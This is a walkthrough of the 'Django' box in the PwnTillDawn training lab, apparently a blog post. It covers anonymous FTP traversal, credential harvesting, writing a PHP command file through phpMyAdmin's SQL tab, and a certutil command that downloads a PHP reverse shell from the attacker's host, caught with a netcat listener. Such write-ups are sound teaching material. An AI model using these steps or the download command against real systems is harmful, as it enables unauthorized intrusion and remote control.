PwnTillDawn Django Walkthrough
Introduction to PwnTillDawn
“PwnTillDawn Online Battlefield is a penetration testing lab created by wizlynx group where participants can test their offensive security skills in a safe and legal environment, but also having fun!”
Link: https://www.wizlynxgroup.com/ || https://online.pwntilldawn.com/
Django
This box consists of 4 flags for submission which can be obtained in numerous ways.
Reconnaissance
Walkthrough
We accessed FTP using anonymous credentials and managed to find ourselves able to perform directory traversal. Listing the directory, we see that there is a FLAG directory, xampp-control.log and zen.txt.
We downloaded the files and looked into its content and found an interesting liner in xampp-control.log that points us to a potential text file containing potential credentials.
Using the get command, we downloaded the passwords.txt to our system and viewed its content. Surely, it contains a set of credentials.
FLAG20.txt
Before we make use of the credentials, we listed the files from the directory “C:\xampp” from our FTP session and found FLAG20.txt residing in the same folder. By downloading the file, we will then get a hold of the flag.
Using the aforementioned credentials, we proceeded to http://10.150.150.212/phpmyadmin/ and logged in with the credentials there.
FLAG18
Digging around the website will show you the flag for flag18 under databases.
Further digging around, we found the SQL tab where we can use to write a file onto the server.
Once the command is executed, we can access the test2.php and run a command to verify.
After confirming that the php upload works, we will then use this to download a webshell from our host machine through the following url:
http://10.150.150.212/test2.php?cmd=certutil -urlcache -split -f http://10.66.67.50/php_reverse_shell.php shell.php
For more information on the file upload method, there is a very informative guide that provides a list of methods that can be used.
Credits: https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65
Once we have downloaded the shell, we can access it after setting up a netcat listener and we will get a shell.
FLAG19.txt
FLAG11.txt
Hope this walkthrough helps people who are stuck!